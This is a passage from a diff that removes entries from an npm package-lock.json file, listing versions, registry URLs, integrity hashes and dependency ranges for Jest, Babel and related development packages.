>=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "dependencies": { - "fill-range": "^7.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": 